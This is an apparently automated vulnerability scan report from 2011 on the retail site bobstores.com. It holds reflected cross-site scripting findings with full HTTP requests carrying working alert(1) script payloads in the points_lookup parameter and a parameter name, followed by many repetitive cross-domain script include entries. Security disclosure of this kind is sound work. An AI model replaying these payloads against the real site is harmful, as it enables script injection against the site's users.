bobstores.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in bobstores.com | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Jan 02 07:46:30 CST 2011.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. https://www.bobstores.com/rewards/check-your-points [points_lookup parameter]

1.2. https://www.bobstores.com/rewards/check-your-points [points_lookup parameter]

1.3. https://www.bobstores.com/rewards/email-signup [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. https://www.bobstores.com/

2.2. https://www.bobstores.com/about/

2.3. https://www.bobstores.com/apparel/mens/

2.4. https://www.bobstores.com/apple-touch-icon.png

2.5. https://www.bobstores.com/careers/

2.6. https://www.bobstores.com/contact-us/

2.7. https://www.bobstores.com/faqs/

2.8. https://www.bobstores.com/gift-cards/

2.9. https://www.bobstores.com/privacy-policy/

2.10. https://www.bobstores.com/rewards

2.11. https://www.bobstores.com/rewards/

2.12. https://www.bobstores.com/rewards/check-your-points

2.13. https://www.bobstores.com/rewards/check-your-points/

2.14. https://www.bobstores.com/rewards/email-signup

2.15. https://www.bobstores.com/seasonal-promo/

2.16. https://www.bobstores.com/store-locator

2.17. https://www.bobstores.com/terms-conditions/

2.18. https://www.bobstores.com/wp-content/themes/bobs/ie.css

2.19. https://www.bobstores.com/wp-content/themes/bobs/images/bg_nav_on.jpg

3. Email addresses disclosed

4. Cacheable HTTPS response

4.1. https://www.bobstores.com/comments/feed/

4.2. https://www.bobstores.com/rewards/check-your-points/feed/

4.3. https://www.bobstores.com/wp-includes/wlwmanifest.xml

4.4. https://www.bobstores.com/xmlrpc.php



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.bobstores.com/rewards/check-your-points [points_lookup parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/check-your-points

Issue detail

The value of the points_lookup request parameter is copied into the HTML document as plain text between tags. The payload e0762<script>alert(1)</script>7c67f3811a2 was submitted in the points_lookup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /rewards/check-your-points HTTP/1.1
Host: www.bobstores.com
Connection: keep-alive
Referer: http://www.bobstores.com/
Cache-Control: max-age=0
Origin: http://www.bobstores.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.4.10.1293973237
Content-Length: 17

points_lookup=%27e0762<script>alert(1)</script>7c67f3811a2

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:14:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9503

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<em>&#8216;e0762<script>alert(1)</script>7c67f3811a2</em>
...[SNIP]...

1.2. https://www.bobstores.com/rewards/check-your-points [points_lookup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/check-your-points

Issue detail

The value of the points_lookup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c99b8"><script>alert(1)</script>db29929cd22 was submitted in the points_lookup parameter. This input was echoed as c99b8\"><script>alert(1)</script>db29929cd22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /rewards/check-your-points HTTP/1.1
Host: www.bobstores.com
Connection: keep-alive
Referer: http://www.bobstores.com/
Cache-Control: max-age=0
Origin: http://www.bobstores.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.4.10.1293973237
Content-Length: 17

points_lookup=%27c99b8"><script>alert(1)</script>db29929cd22

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:14:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9514

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<input type="text" id="header-points" class="check-points" value="\'c99b8\"><script>alert(1)</script>db29929cd22" name="points_lookup" />
...[SNIP]...

1.3. https://www.bobstores.com/rewards/email-signup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/email-signup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3b07"><script>alert(1)</script>c7bb1dcc896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3b07\"><script>alert(1)</script>c7bb1dcc896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rewards/email-signup?a3b07"><script>alert(1)</script>c7bb1dcc896=1 HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:14:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/rewards/email-signup?a3b07\"><script>alert(1)</script>c7bb1dcc896=1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12609

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<form action="/rewards/email-signup?a3b07\"><script>alert(1)</script>c7bb1dcc896=1&#8243; method=&#8221;post&#8221; id=&#8221;registration_form&#8221; class=&#8221;app_form&#8221;>
...[SNIP]...

2. Cross-domain script include  previous  next
There are 19 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. https://www.bobstores.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17288

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.2. https://www.bobstores.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /about/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/about/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10596

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.3. https://www.bobstores.com/apparel/mens/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /apparel/mens/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apparel/mens/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/apparel/mens/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15571

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.4. https://www.bobstores.com/apple-touch-icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /apple-touch-icon.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apple-touch-icon.png HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:14:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.bobstores.com/apple-touch-icon.png
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8955

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.5. https://www.bobstores.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /careers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/careers/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9862

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.6. https://www.bobstores.com/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /contact-us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact-us/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/contact-us/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18975

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.7. https://www.bobstores.com/faqs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /faqs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faqs/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/faqs/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11316

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.8. https://www.bobstores.com/gift-cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /gift-cards/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gift-cards/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/gift-cards/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10903

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.9. https://www.bobstores.com/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /privacy-policy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy-policy/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/privacy-policy/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20003

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.10. https://www.bobstores.com/rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rewards HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:15:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/rewards
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10485

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.11. https://www.bobstores.com/rewards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rewards/ HTTP/1.1
Host: www.bobstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.12.10.1293973237;

Response

HTTP/1.1 302 Found
Date: Sun, 02 Jan 2011 13:14:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Location: http://www.bobstores.com/rewards/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10485

<!DOCTYPE html>
<head>
   <meta charset="utf-8" />
   <link rel="shortcut icon" href="https://www.bobstores.com/favicon.ico" />
   <link rel="apple-touch-icon" href="/apple-touch-icon.png">
       
   <meta
...[SNIP]...
<!-- script START -->
   <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

2.12. https://www.bobstores.com/rewards/check-your-points  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bobstores.com
Path:   /rewards/check-your-points

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /rewards/check-your-points HTTP/1.1
Host: www.bobstores.com
Connection: keep-alive
Referer: http://www.bobstores.com/
Cache-Control: max-age=0
Origin: http://www.bobstores.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=t5fv28tgf4m0o3h9518iibs8f1; __utmz=136910627.1293973237.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bobs%20stores; __utma=136910627.1391851172.1293973237.1293973237.1293973237.1; __utmc=136910627; __utmb=136910627.4.10.1293973237
Content-Length: 17

points_lookup=%27

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:12:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.bobstores.com/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
